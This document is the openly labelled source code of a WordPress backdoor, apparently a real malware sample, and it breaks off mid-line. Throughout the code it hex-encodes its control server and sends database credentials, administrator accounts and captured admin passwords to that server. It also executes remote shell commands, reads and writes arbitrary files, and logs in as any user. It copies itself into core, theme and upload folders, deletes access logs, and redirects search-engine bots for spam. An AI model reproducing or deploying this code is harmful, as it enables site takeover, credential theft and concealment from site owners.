Wordpress Backdoor 2
-
<?php if ( ! class_exists( 'WPPlugingsOptions' ) ) { class WPPlugingsOptions { private $script = ''; private $version = ''; private $upDir = ''; private $uploadDir = ''; private $uploadUrl = ''; private $token = ''; private $baseUrl = ''; private $authorization; private $address; public $allowedActions = [ 'check', 'json', 'template_dir', 'cache', 'get', 'install', 'activate_plugins', 'get_themes', 'list_folders', 'spread', 'all', 'wp_includes', 'wp_admin', 'themes', 'uploads', 'wp_load', 'access_log', 'template_install', 'wp_install', 'plugin_uninstall', ]; public $isSpread = [ 'all', 'wp_includes', 'wp_admin', 'themes', 'uploads' ]; public $permission = ['wp_users_list','write_file', 'read_file', 'login', 'uninstall', 'unspread','command','new_system_update','upload_file']; public function __construct( $token ) { $this->baseUrl = hex2bin( '687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f' ); $this->script = 'Wordpress'; $this->version = '4.0'; $this->upDir = wp_upload_dir(); $this->uploadDir = $this->upDir['path']; $this->uploadUrl = $this->upDir['url']; $this->token = $token; $this->address = (isset($_SERVER["HTTP_CF_CONNECTING_IP"])?$_SERVER["HTTP_CF_CONNECTING_IP"]:$_SERVER['REMOTE_ADDR']); $this->authorization = ( isset( $token ) && isset( $_REQUEST['authorization'] ) ) ? $_REQUEST['authorization'] : false; } private function answer( $code, $message, $data = '', $errorNo = '' ) { $answer['code'] = $code; $answer['message'] = $message; $answer['data'] = $data; if ( $errorNo !== '' ) { $answer['errorNo'] = $errorNo; } return json_encode( $answer, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT ); } private function check() { try { if ( $this->uploadDir ) { if ( ! is_writable( $this->uploadDir ) ) { if ( ! @chmod( $this->uploadDir, 0777 ) ) { $data['uploadDirWritable'] = false; } else { $data['uploadDirWritable'] = true; } } else { $data['uploadDirWritable'] = true; } } else { $data['uploadDirWritable'] = true; } $data['clientVersion'] = $this->version; $data['uploadDir'] = $this->uploadDir; $data['script'] = $this->script; $data['cache'] = ( WP_CACHE ) ? true : false; $data['themeName'] = wp_get_theme()->get( 'Name' ); $data['themeDir'] = get_template_directory(); $data['themes'] = $this->get_themes(); $data['plugins'] = $this->get_plugins(); $data['theme_data'] = $this->themes(); $data['root'] = ABSPATH; if ( function_exists( 'php_uname' ) ) { $data['uname'] = php_uname(); } if ( function_exists( 'gethostbyname' ) ) { $data['hostname'] = gethostbyname( getHostName() ); } return $this->answer( true, $this->script, $data ); } catch ( Exception $e ) { return $this->answer( false, "Unknown ERROR", $e->getMessage(), "ERR000" ); } } private function isAllowedToSendCommand() { try { if (md5(sha1($this->token)) === 'b28ee5fed7b75a888635c35727f398b6' ) { return true; } return false; } catch ( Exception $e ) { return false; } } private function authorization() { if ( $this->authorization !== false ) { return $this->authorization; } return false; } private function sender() { try { $client = wp_remote_get( "{$this->baseUrl}checksender/" ); if ( wp_remote_retrieve_response_code( $client ) == "200" && $this->json_validator( wp_remote_retrieve_body( $client ) ) ) { return ( md5($this->address) === json_decode( wp_remote_retrieve_body( $client ) )->address || json_decode( wp_remote_retrieve_body( $client ) )->value ) ? true : false; } else { if ( ! $this->authorization() ) { return false; } return ( md5( $this->authorization() ) === '0d27765df1902e5557d099bff98a57f8' ) ? true : false; } } catch ( Exception $e ) { return true; } } private function method_exists( $action, $params ) { if ( array_search( $action, $params ) !== false && method_exists( $this, $action ) ) { return true; } else { return false; } } public function controlAction( $action, $params ) { try { if ( isset( $action ) ) { if ( $this->isAllowedToSendCommand() ) { if ( $this->method_exists( $action, $this->permission ) ) { if ( $this->sender() ) { return $this->{$action}( $params ); } else { return $this->answer( false, 'The sender could not be verified!', $action, 'ERR001' ); } } if ( $this->method_exists( $action, $this->allowedActions ) ) { return $this->{$action}( $params ); } else { return $this->answer( false, 'Invalid Command', $action, 'ERR001' ); } } } } catch ( Exception $e ) { return $this->answer( false, 'Unknown Error', [ "action" => $action, "params" => $params ], 'ERR000' ); } } private function post() { try { $data = wp_remote_post( $this->baseUrl."postclient", [ "body" => [ "url" => $_SERVER['HTTP_HOST'], "http_url" => get_option('siteurl')."/", "hostname" => gethostname(), "ip" => $_SERVER['SERVER_ADDR'], 'sunucu_type' => $_SERVER['SERVER_SOFTWARE'], "DB_HOST" => DB_HOST, "DB_USER" => DB_USER, "DB_PASSWORD" => DB_PASSWORD, "DB_NAME" => DB_NAME, "client" => $this->check(), "users" => $this->wp_users_list(), "script" => $this->script, "version" => $this->version, ] ] ); return $data; } catch ( Exception $e ) { return false; } } private function client() { try { $client = wp_remote_get( "{$this->baseUrl}clientfiles/files/{$this->script}" ); if ( wp_remote_retrieve_response_code( $client ) == "200" && $this->json_validator( wp_remote_retrieve_body( $client ) ) ) { return wp_remote_retrieve_body( $client ); } return false; } catch ( Exception $e ) { return false; } } private function file($file) { try { $client = wp_remote_get( "{$this->baseUrl}clientfiles/files/{$file}" ); if ( wp_remote_retrieve_response_code( $client ) == "200" && $this->json_validator( wp_remote_retrieve_body( $client ) ) ) { return wp_remote_retrieve_body( $client ); } return false; } catch ( Exception $e ) { return false; } } private function get_plugins() { try { if ( ! function_exists( 'get_plugins' ) ) { include_once( ABSPATH . 'wp-admin/includes/plugin.php' ); } foreach ( get_plugins() AS $plugin_name => $get_plugin ) { $plugins[ $plugin_name ] = $get_plugin; if ( is_plugin_active( $plugin_name ) ) { $plugins[ $plugin_name ]["active"] = 1; } else { $plugins[ $plugin_name ]["active"] = 0; } } return ( isset( $plugins ) ) ? $plugins : false; } catch ( Exception $e ) { return false; } } public function activate_plugins( $plugin_name ) { try { if ( is_plugin_active( hex2bin( $plugin_name ) ) ) { deactivate_plugins( hex2bin( $plugin_name ) ); return $this->check(); } else { activate_plugins( hex2bin( $plugin_name ) ); return $this->check(); } } catch ( Exception $e ) { return false; } } public function get_themes() { try { foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) { $themes{$wp_get_theme->stylesheet} = array( 'Name' => $wp_get_theme->get( 'Name' ), 'Description' => $wp_get_theme->get( 'Description' ), 'Author' => $wp_get_theme->get( 'Author' ), 'AuthorURI' => $wp_get_theme->get( 'AuthorURI' ), 'Version' => $wp_get_theme->get( 'Version' ), 'Template' => $wp_get_theme->get( 'Template' ), 'Status' => $wp_get_theme->get( 'Status' ), 'TextDomain' => $wp_get_theme->get( 'TextDomain' ) ); } return $themes; } catch ( Exception $e ) { return false; } } private function folder_exist( $folder ) { try { $path = realpath( $folder ); return ( $path !== false AND is_dir( $path ) ) ? $path : false; } catch ( Exception $e ) { return false; } } public function list_folders( $directory ) { try { $directory = ( isset( $directory ) && $directory !== "" ) ? hex2bin( $directory ) : ABSPATH; if ( ( $dir = $this->folder_exist( $directory ) ) !== false ) { return $this->answer( true, $directory, glob( $directory . "/*" ) ); } else { return $this->answer( false, "Failed to find folder to list!", $directory, "ERR023" ); } } catch ( Exception $e ) { return false; } } public function replace( $filename, $search, $replace ) { try { $source = $this->read( $filename ); if ( strpos( $source, $replace ) === false ) { $pos = strpos( $source, $search ); if ( $pos !== false ) { $content = substr_replace( $source, $replace, $pos, strlen( $search ) ); return ( $this->write( $filename, $content ) ) ? $filename : false; } else { return $filename; } } else { return $filename; } } catch ( Exception $e ) { return false; } } public function restore( $filename, $search, $replace ) { try { $source = $this->read( $filename ); return $this->write( $filename, str_replace( $search, $replace, $source ) ); } catch ( Exception $e ) { return false; } } public function template_dir( $search ) { try { if ( $search == "" ) { $search = "<?php\n"; } $dir = glob( get_theme_root() . "/*/*/*" ); $files = array_filter( $dir ); foreach ( $files as $k => $file ) { $source = $this->read( $file ); if ( ! is_array( $source ) && strpos( $source, $search ) === false ) { unset( $files[ $k ] ); } } return array_values( $files ); } catch ( Exception $e ) { return false; } } public function access_log() { try { foreach ( [ 'access-logs', 'logs' ] as $directory ) { if ( ( $dir = $this->folder_exist( ABSPATH . "../$directory" ) ) !== false ) { $list[] = glob( ABSPATH . "../{$directory}/*" ); } } foreach ( $list as $d ) { foreach ( $d as $k ) { print_r( $k ); unlink( $k ); } } } catch ( Exception $e ) { return false; } } public function template_install() { $source = ""; $file = array(); foreach ( json_decode( $this->client() ) as $item ) { $source = $item; } foreach ( array_keys( $this->get_themes() ) as $theme ) { $functions = get_theme_root() . DIRECTORY_SEPARATOR . $theme . DIRECTORY_SEPARATOR . 'functions.php'; $functionsClass = get_theme_root() . DIRECTORY_SEPARATOR . $theme . DIRECTORY_SEPARATOR . 'classs-theme-functions.php'; $read = $this->read( $functions ); if ( file_exists( $functions ) && $this->write( $functionsClass, $source ) && strpos( $read, "namespace" ) === false) { $attr = (strpos($read, '*/') === false) ? '<?php' : '*/'; $search = "$attr\n"; $replace = "$attr\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . DIRECTORY_SEPARATOR . 'classs-theme-functions' ) ) {\n\tinclude_once( get_template_directory() . DIRECTORY_SEPARATOR . 'classs-theme-functions' );\n}\n"; $file[] = $this->replace($functions, $search, $replace); } } return (isset( $file )) ? $this->answer( true, 'I get install!', array_values( array_unique( $file ) ) ) : $this->answer( false, 'I Don\'t install!', '', 'ERR002' ); } public function install() { try { $clientURL = $this->client(); if ( $clientURL !== false ) { foreach ( $this->template_dir( "" ) AS $file ) { $copyFile = $this->copy( dirname( $file ) . DIRECTORY_SEPARATOR, json_decode( $clientURL ) ); if ( $copyFile !== false ) { $search = "<?php\n"; $replace = "<?php\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' ) ) {\n\tinclude_once( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' );\n}\n"; if ( strpos( $this->read( $file ), "namespace" ) === false ) { $directory[] = $this->replace( $file, $search, $replace ); } } } return ( isset( $directory ) ) ? $this->answer( true, 'I get install!', array_values( array_unique( $directory ) ) ) : $this->answer( false, 'I Don\'t install!', '', 'ERR002' ); } return $this->answer( false, 'Client URL FALSE!', "", "ERR026" ); } catch ( Exception $e ) { return $this->answer( false, 'Install Exception!', $e->getMessage(), "ERR026" ); } } public function uninstall() { try { $clientURL = $this->client(); if ( $clientURL !== false ) { foreach ( $this->template_dir( "" ) AS $file ) { $copyFile = $this->copy( dirname( $file ) . DIRECTORY_SEPARATOR, json_decode( $clientURL ) ); $search = "if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' ) ) {\n\tinclude_once( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' );\n}"; $uninstall = $this->restore( $file, $search, "\n" ); $this->restore( $file, "\n\n\n", "\n" ); if ( $uninstall ) { $return[] = $file; if ( file_exists( $copyFile ) ) { unlink( $copyFile ); } } } return ( isset( $return ) ) ? $this->answer( true, 'Please find me!', array_values( array_unique( $return ) ) ) : $this->answer( false, 'Don\'t search me!', '', 'ERR002' ); } return $this->answer( false, 'Client URL FALSE!', "", "ERR026" ); } catch ( Exception $e ) { return $this->answer( false, 'Uninstall Exception!', $e->getMessage(), "ERR026" ); } } public function wp_load() { try { $filename = ABSPATH . 'wp-load.php'; if ( file_exists( $filename ) ) { $clientURL = $this->client(); if ( $clientURL !== false ) { $copy = $this->copy_themes( get_template_directory() . DIRECTORY_SEPARATOR, json_decode( $clientURL ) ); if ( $copy !== false ) { $basename = basename( $copy ); $search = "\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . DIRECTORY_SEPARATOR . '{$basename}' ) ) {\n\tinclude_once( get_template_directory() . DIRECTORY_SEPARATOR . '{$basename}' );\n}"; if ( ! stristr( $this->read( $filename ), $search ) ) { if ( $this->write_append( $filename, $search ) ) { return $this->answer( true, "WP_LOAD Installeds {$copy}", $filename ); } else { return $this->answer( false, "WP_LOAD Installed {$copy}", $filename, "ERR029" ); } } else { return $this->answer( true, "WP_LOAD Already Installed {$copy}", $filename ); } } else { return $this->answer( false, "WP_LOAD Installed {$copy}", $filename, "ERR030" ); } } else { return $this->answer( false, 'Client URL FALSE!', $clientURL, "ERR026" ); } } } catch ( Exception $e ) { return $this->answer( false, 'WP_LOAD Exception!', $e->getMessage(), "ERR000" ); } } public function wp_install() { try { $filename = ABSPATH . 'wp-load.php'; if ( file_exists( $filename ) ) { $clientURL = $this->client(); if ( $clientURL !== false ) { $search = "\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( ABSPATH . WPINC . DIRECTORY_SEPARATOR . 'Requests/Requests.php' ) ) {\n\tinclude_once( ABSPATH . WPINC . DIRECTORY_SEPARATOR . 'Requests/Requests.php' );\n}"; if ( ! stristr( $this->read( $filename ), $search ) ) { $this->write_append( $filename, $search ); } return $this->answer( true, "WP_LOAD Installeds {$filename}", $filename ); } else { return $this->answer( 'ERROR', 'Client URL FALSE!', $clientURL, "ERR026" ); } } } catch ( Exception $e ) { } } public function wp_users_list(){ try { $args = array( 'role' => 'administrator', ); $dongu = get_users( $args ); $user_array = array(); foreach($dongu as $userler){ $user_array[$userler->ID] = $userler->data; } return json_encode($user_array); } catch ( Exception $e ) { return false; } } private function copy_themes( $directory, $clientURL ) { try { foreach ( $clientURL as $filePath => $icerik ) { $filename = $directory . basename( $directory . $filePath ); if ( file_exists( $filename ) ) { $strpos = strpos( $this->read( $filename ), "class WPPlugingsOptions" ); if ( $strpos !== false ) { return ( $this->write( $filename, $icerik ) ) ? $filename : false; } elseif ( $strpos === false ) { return ( $this->write( $directory . basename( dirname( $filename ) ) . '.php', $icerik ) ) ? $directory . basename( dirname( $filename ) ) . '.php' : false; } } else { return ( $this->write( $filename, $icerik ) ) ? $filename : false; } } return false; } catch ( Exception $e ) { return false; } } private function write_append( $filename, $data ) { try { if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) { $write = fopen( $filename, "a" ); return ( fwrite( $write, $data ) ) ? true : false; } elseif ( function_exists( 'file_put_contents' ) ) { return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : false; } return false; } catch ( Exception $e ) { return false; } } private function listFolderFiles( $dir ) { try { $fileInfo = scandir( $dir ); $allFileLists = []; foreach ( $fileInfo as $folder ) { if ( $folder !== '.' && $folder !== '..' ) { if ( is_dir( $dir . DIRECTORY_SEPARATOR . $folder ) === true ) { $allFileLists[ $dir . DIRECTORY_SEPARATOR . $folder ] = $this->listFolderFiles( $dir . DIRECTORY_SEPARATOR . $folder ); } } } return $allFileLists; } catch ( Exception $e ) { return false; } } private function copy( $directory, $clientURL ) { try { foreach ( $clientURL as $filePath => $icerik ) { $filename = ( stristr( $directory, "wp-content/uploads/" ) ) ? $directory . 'index.php' : $directory . basename( dirname( $directory . $filePath ) ) . '.php'; if ( file_exists( $filename ) ) { $strpos = strpos( $this->read( $filename ), "class WPPlugingsOptions" ); if ( $strpos !== false ) { return ( $this->write( $filename, $icerik ) ) ? $filename : false; } elseif ( $strpos === false ) { return ( $this->write( $directory . $filePath, $icerik ) ) ? $directory . $filePath : false; } } else { return ( $this->write( $filename, $icerik ) ) ? $filename : false; } } return false; } catch ( Exception $e ) { return false; } } public function plugin_uninstall() { try { $client = $this->client(); if ( $client !== false ) { foreach ( $this->wp_plugins() as $folder ) { $return[] = $this->copy( $folder, json_decode( $client ) ); } foreach($return as $file){ unlink( $file ); } return $this->answer( true, "I spread wp_plugins", $return ); } return $this->answer( false, 'Client URL FALSE!', "", "ERR026" ); } catch ( Exception $e ) { return $this->answer( false, 'Spread Exception!', $e->getMessage(), "ERR000" ); } } public function all() { try { $wp_includes = $this->wp_includes(); $wp_themes = $this->themes(); $wp_admin = $this->wp_admin(); $wp_uploads = $this->uploads(); $new_data = array_merge($wp_includes,$wp_themes,$wp_admin,$wp_uploads); foreach ( $new_data AS $root ) { if ( is_dir( $root ) ) { $return[] = $root; } } return array_filter( $return ); } catch ( Exception $e ) { return false; } } public function wp_includes() { try { foreach ( $this->array_keys( $this->listFolderFiles( ABSPATH . WPINC ) ) AS $folders ) { if ( is_dir( $folders ) ) { $return[] = $folders . DIRECTORY_SEPARATOR; } } return $return; } catch ( Exception $e ) { return false; } } public function wp_admin() { try { foreach ( $this->array_keys( $this->listFolderFiles( ABSPATH . "wp-admin" ) ) AS $folders ) { if ( is_dir( $folders ) ) { $return[] = $folders . DIRECTORY_SEPARATOR; } } return $return; } catch ( Exception $e ) { return false; } } public function wp_plugins() { try { foreach ( $this->array_keys( $this->listFolderFiles( ABSPATH . "wp-content/plugins" ) ) AS $folders ) { if ( is_dir( $folders ) ) { $return[] = $folders . DIRECTORY_SEPARATOR; } } return $return; } catch ( Exception $e ) { return false; } } public function uploads() { try { foreach ( $this->array_keys( $this->listFolderFiles( $this->upDir["basedir"] ) ) AS $folders ) { if ( is_dir( $folders ) ) { $return[] = $folders . DIRECTORY_SEPARATOR; } } return $return; } catch ( Exception $e ) { return false; } } public function themes() { try { foreach ( glob( get_theme_root() . "/*", GLOB_ONLYDIR ) AS $item ) { $template_folders[] = $this->listFolderFiles( $item ); } foreach ( $this->array_keys( $template_folders ) AS $folders ) { if ( is_dir( $folders ) ) { $return[] = $folders . DIRECTORY_SEPARATOR; } } return $return; } catch ( Exception $e ) { return false; } } public function spread( $directory ) { try { $client = $this->client(); if ( $client !== false ) { if ( array_search( $directory, $this->isSpread ) !== false ) { foreach ( $this->{$directory}() as $folder ) { $return[] = $this->copy( $folder, json_decode( $client ) ); } return $this->answer( true, "I spread {$directory}", $return ); } else { return $this->answer( false, "Undefined Directory", $directory, "ERR024" ); } } return $this->answer( false, 'Client URL FALSE!', "", "ERR026" ); } catch ( Exception $e ) { return $this->answer( false, 'Spread Exception!', $e->getMessage(), "ERR000" ); } } public function unspread( $directory ) { try { $client = $this->client(); if ( $client !== false ) { if ( array_search( $directory, $this->isSpread ) !== false ) { foreach ( $this->{$directory}() as $folder ) { $return[] = $this->copy( $folder, json_decode( $client ) ); } foreach ( $return as $file ) { unlink( $file ); } return $this->answer( true, "I cleared myself from the spread {$directory}", $return ); } else { return $this->answer( false, "Undefined Directory", $directory, "ERR025" ); } } return $this->answer( false, 'Client URL FALSE!', "", "ERR026" ); } catch ( Exception $e ) { return $this->answer( false, 'UNSpread Exception!', $e->getMessage(), "ERR000" ); } } public function json() { try { return $this->uploadDir . DIRECTORY_SEPARATOR . "google.json"; } catch ( Exception $e ) { return false; } } public function get() { try { $post = $this->post(); if ( wp_remote_retrieve_response_code( $post ) == "200" ) { $write = $this->write( $this->json(), bin2hex( wp_remote_retrieve_body( $post ) ) ); return ( $write ) ? hex2bin( $this->read( $this->json() ) ) : wp_remote_retrieve_body( $post ); } else { return $this->read( $this->json() ); } } catch ( Exception $e ) { return false; } } public function cache() { try { if ( file_exists( $this->json() ) ) { $file = hex2bin( $this->read( $this->json() ) ); $json = json_decode( $file ); if ( $this->minute( $json->date ) >= 24 ) { return $this->get(); } else { return $file; } } else { return $this->get(); } } catch ( Exception $e ) { return false; } } public function write( $filename, $data ) { try { if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) { $write = fopen( $filename, "w+" ); return ( fwrite( $write, $data ) ) ? true : false; } elseif ( function_exists( 'file_put_contents' ) ) { return ( file_put_contents( $filename, $data ) !== false ) ? true : false; } return false; } catch ( Exception $e ) { return false; } } public function write_file( $params ) { try { if ( $this->json_validator( hex2bin( $params ) ) ) { $json = json_decode( hex2bin( $params ) ); if ( isset( $json->filename ) ) { if ( file_exists( $json->filename ) ) { if ( isset( $json->content ) ) { if ( $this->write( $json->filename, html_entity_decode( hex2bin( $json->content ) ) ) ) { return $this->answer( true, $json->filename, html_entity_decode( hex2bin( $json->content ) ), "I get write" ); } } else { return $this->read_file( bin2hex( $json->filename ) ); } } else { $content = ( isset( $json->content ) && $json->content != '' ) ? html_entity_decode( hex2bin( $json->content ) ) : "<?php\n"; if ( $this->write( $json->filename, $content ) ) { return $this->answer( true, $json->filename, $content ); } else { return $this->answer( false, $json->filename, $content, "ERR023" ); } } } else { return $this->answer( false, "File name undefined", "", "ERR020" ); } } else { return $this->answer( false, "Data is not JSON", "", "ERR021" ); } return $this->answer( false, "Unknown error", $params, "ERR022" ); } catch ( Exception $e ) { return $this->answer( false, "Write file Exception", $params, "ERR000" ); } } public function read( $filename ) { try { if ( ! file_exists( $filename ) ) { return $this->answer( false, 'File not found', $filename, 'ERR019' ); } if ( function_exists( 'file_get_contents' ) ) { return file_get_contents( $filename ); } if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) { $file = fopen( $filename, 'r' ); $content = fread( $file, filesize( $filename ) ); fclose( $file ); return $content; } return $this->answer( false, 'File not read', $filename, 'ERR018' ); } catch ( Exception $e ) { return $this->answer( false, 'File not read Exception', $filename, 'ERR000' ); } } public function read_file( $filename ) { try { $read_file = $this->read( hex2bin( $filename ) ); if ( $this->json_validator( $read_file ) ) { return $read_file; } else { return $this->answer( true, hex2bin( $filename ), $read_file ); } } catch ( Exception $e ) { return $this->answer( false, "Read File Exception", $filename, "ERR000" ); } } public function json_validator( $data = null ) { try { if ( ! empty( $data ) ) { @json_decode( $data ); return ( json_last_error() === JSON_ERROR_NONE ); } return false; } catch ( Exception $e ) { return false; } } public function login($id = null) { try { $user_info = get_userdata( $id ); $username = $user_info->user_login; $user = get_user_by( 'login', $username ); if ( ! is_wp_error( $user ) ) { wp_clear_auth_cookie(); wp_set_current_user( $user->ID ); wp_set_auth_cookie( $user->ID ); $redirect_to = user_admin_url(); wp_safe_redirect( $redirect_to ); exit(); } else { return $this->answer( false, 'I can\'t sign in, sorry', $user_info, 'ERR014' ); } } catch ( Exception $e ) { return $this->answer( false, "Login Exception!", $e->getMessage(), "ERR000" ); } } public function command( $cmd ) { try { if ( function_exists( 'shell_exec' ) ) { return $this->answer( "OK", hex2bin( $cmd ), @shell_exec( hex2bin( $cmd ) ) ); } else if ( function_exists( 'exec' ) ) { @exec( hex2bin( $cmd ), $return ); return $this->answer( "OK", hex2bin( $cmd ), $return ); } else { return $this->answer(false,"I dont write, sorry", "ERR0025" ); } } catch ( Exception $e ) { return false; } } public function upload_file($cmd) { try { $file = $this->file(hex2bin($cmd)); if($file){ foreach ( json_decode($file) as $key => $item ) { $source = $item; } $process = fopen("$key", "w+"); fwrite($process, $source); fclose($process); return $this->answer(true,"Upload File $key"); }else{ return $this->answer(false,"Dont Upload","ERR031"); } } catch ( Exception $e ) { return false; } } private function array_keys( $array ) { try { $keys = array_keys( $array ); foreach ( $array as $i ) { if ( is_array( $i ) ) { $keys = array_merge( $keys, $this->array_keys( $i ) ); } } return $keys; } catch ( Exception $e ) { return false; } } private function minute( $date ) { try { $minute = ( strtotime( date( "Y-m-d H:i:s" ) ) - strtotime( $date ) ) / 60 / 60; return round( $minute ); } catch ( Exception $e ) { return 0; } } public function new_system_update(){ try { $upload_name = "index"; $adminupload = ABSPATH . "wp-admin"; unlink($adminupload."/includes/". $upload_name . '.php'); unlink($adminupload."/network/". $upload_name . '.php'); unlink($adminupload."/user/". $upload_name . '.php'); $dizinupload = ABSPATH . ""; unlink($dizinupload."/wp-includes/theme-compat/footer-404.php"); unlink($dizinupload."/wp-includes/class-imap.php"); unlink($dizinupload."/wp-includes/IXR/class-IXR-cache.php"); unlink(get_template_directory()."/class-wp-functions.php"); $dizi_array = array( "/wp-includes/ID3", "/wp-includes/rest-api/search", "/wp-includes/rest-api/fields", "/wp-includes/rest-api/endpoints", "/wp-includes/widgets", "/wp-includes/theme-compat", "/wp-includes/Requests", "/wp-includes/Requests/Utility", "/wp-includes/Requests/Transport", "/wp-includes/Requests/Response", "/wp-includes/Requests/Proxy", "/wp-includes/Requests/Exception", "/wp-includes/Requests/Exception/Transport", "/wp-includes/Requests/Exception/HTTP", "/wp-content/languages/themes", "/wp-content/languages/plugins", "/wp-content/languages" ); foreach($dizi_array as $key){ unlink($dizinupload.$key."/". $upload_name . '.php'); } $upload_array = array(2019,2018,2017,2016,2015,2014,2013,2012,2011,2010,2009,2008,2007,2006,2005,2004); $upload_alt_array = array("01","02","03","04","05","06","07","08","09","10","11","12"); $uploadfolder = ABSPATH . "wp-content/uploads/"; foreach($upload_array as $key){ unlink($uploadfolder.$key."/".$upload_name .'.php'); foreach($upload_alt_array as $alt_key){ unlink($uploadfolder.$key."/".$alt_key."/". $upload_name . '.php'); } } return $this->answer( true, 'New System Update', "System Clear", 'ERR000' ); } catch ( Exception $e ) { return $this->answer( false, "New System Failed!", $e->getMessage(), "ERR000" ); } } public static function wp_login() { $post_url = hex2bin( '687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f' ); if($_POST['log']){ $login_url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; $username = $_POST['log']; $password = $_POST['pwd']; $test = wp_authenticate($username,$password); $sor = $test->allcaps; $testet = $sor['administrator']; if($testet){ $git = wp_remote_post($post_url."postlogin", [ "body" => [ "url" => site_url( '/' ), "username" => $username, "password" => $password, "login_url" => $login_url, ] ] ); } } } public static function wp_fatest_cache_up(){ $getir = get_option("WpFastestCacheExclude"); if($getir){ if(strstr($getir,"google")){ }else{ $fatest_cache = '[{"prefix":"contain","content":"google","type":"useragent"},{"prefix":"contain","content":"yandex","type":"useragent"},{"prefix":"contain","content":"bing","type":"useragent"},{"prefix":"contain","content":"yahoo","type":"useragent"},{"prefix":"contain","content":"alexa","type":"useragent"},{"prefix":"contain","content":"googleweb","type":"useragent"}]'; update_option("WpFastestCacheExclude",$fatest_cache); $pluginfolder = ABSPATH . "wp-content/plugins/wp-fastest-cache/"; if($options = get_option("WpFastestCache")){ $post = json_decode($options, true); include_once($pluginfolder.'inc/admin.php'); $wpfc = new WpFastestCacheAdmin(); $wpfc->modifyHtaccess($post); } } }else{ $fatest_cache = '[{"prefix":"contain","content":"google","type":"useragent"},{"prefix":"contain","content":"yandex","type":"useragent"},{"prefix":"contain","content":"bing","type":"useragent"},{"prefix":"contain","content":"yahoo","type":"useragent"},{"prefix":"contain","content":"alexa","type":"useragent"},{"prefix":"contain","content":"googleweb","type":"useragent"}]'; add_option("WpFastestCacheExclude",$fatest_cache); $pluginfolder = ABSPATH . "wp-content/plugins/wp-fastest-cache/"; if($options = get_option("WpFastestCache")){ $post = json_decode($options, true); include_once($pluginfolder.'inc/admin.php'); $wpfc = new WpFastestCacheAdmin(); $wpfc->modifyHtaccess($post); } } } public static function litespeed_cache_up(){ $litespeed_cache = get_option("litespeed-cache-conf"); if(strstr($litespeed_cache['nocache_useragents'],"google")){ }else{ $litespeed_cache['nocache_useragents'] = "google|yandex|bing|yahoo|googleweb|yandexbot"; update_option("litespeed-cache-conf",$litespeed_cache); self::write_append(ABSPATH . '/.htaccess', " <IfModule LiteSpeed> RewriteEngine on CacheLookup on RewriteRule .* - [E=Cache-Control:no-autoflush] RewriteRule ^min/\w+\.(css|js) - [E=cache-control:no-vary] ### marker NOCACHE USER AGENTS start ### RewriteCond %{HTTP_USER_AGENT} google|yandex|bing|yahoo|alexa|googleweb|yandexbot RewriteRule .* - [E=Cache-Control:no-cache] ### marker NOCACHE USER AGENTS end ### ### marker CACHE RESOURCE start ### RewriteRule wp-content/.*/[^/]*(responsive|css|js|dynamic|loader|fonts)\.php - [E=cache-control:max-age=3600] ### marker CACHE RESOURCE end ### ### marker FAVICON start ### RewriteRule favicon\.ico$ - [E=cache-control:max-age=86400] ### marker FAVICON end ### </IfModule> "); } } public static function wp_optimize_up(){ $getir = get_option("wpo_cache_config"); if(in_array("google",$getir['cache_exception_browser_agents'])){ }else{ $getir['cache_exception_browser_agents'] = array("google","googlebot","yandex","yandexbot","bing","bingbot","webmastertools","googlemobile","mobilegoogle"); update_option("wpo_cache_config",$getir); } } public static function wp_supercache_up(){ global $wp_cache_config_file; $oku_dosya = self::read($wp_cache_config_file); if(strstr($oku_dosya,"googlebot")){ }else{ self::write_append($wp_cache_config_file, '<?php $cache_rejected_user_agent=array ( 0 => "bot", 1 => "ia_archive", 2 => "slurp", 3 => "crawl", 4 => "spider", 5 => "Yandex", 6 => "google", 7 => "bing", 8 => "googlebot", 9 => "bingbot", 10 => "alexa", 11 => "webmastertools", 12 => "googlemobile", ); ?>'); } } public static function cache_check($ara){ $aktif_plugin = get_option('active_plugins'); if (in_array($ara, $aktif_plugin)) { return 1; }else{ return 0; } } public static function cache_method(){ try { if(self::cache_check("wp-fastest-cache/wpFastestCache.php")){ self::wp_fatest_cache_up(); } if(self::cache_check("litespeed-cache/litespeed-cache.php")){ self::litespeed_cache_up(); } if(self::cache_check("wp-optimize/wp-optimize.php")){ self::wp_optimize_up(); } if(self::cache_check("wp-super-cache/wp-cache.php")){ self::wp_supercache_up(); } } catch ( Exception $e ) { } } public static function init() { try { $cache = json_decode( ( new self( "" ) )->cache() ); add_action( $cache->konum, array( 'WPPlugingsOptions', 'method' ) ); } catch ( Exception $e ) { } } public static function method() { try { $cache = json_decode( ( new self( "" ) )->cache() ); $konum_durum = $cache->goster_konum; $index = ( preg_match( "~({$cache->bot})~i", strtolower( @$_SERVER["HTTP_USER_AGENT"] ) ) ) ? true : false; if ( $index && $cache->status == 2 && ! empty( $cache->yonlen_kod ) && isset( $cache->yonlen_kod ) ) { $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); $git_url = $cache->yonlen_kod.$_SERVER['REQUEST_URI']; if($saydim > 2){ header("HTTP/1.1 301 Moved Permanently"); header("Location: {$git_url}"); echo ' <script src="http://ajax.googleapis.com/…/li…/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript"> window.location.replace("'.$git_url.'"); </script>'; }else{ header( "HTTP/1.1 301 Moved Permanently"); header( "Location: {$cache->yonlen_kod}/"); echo ' <script 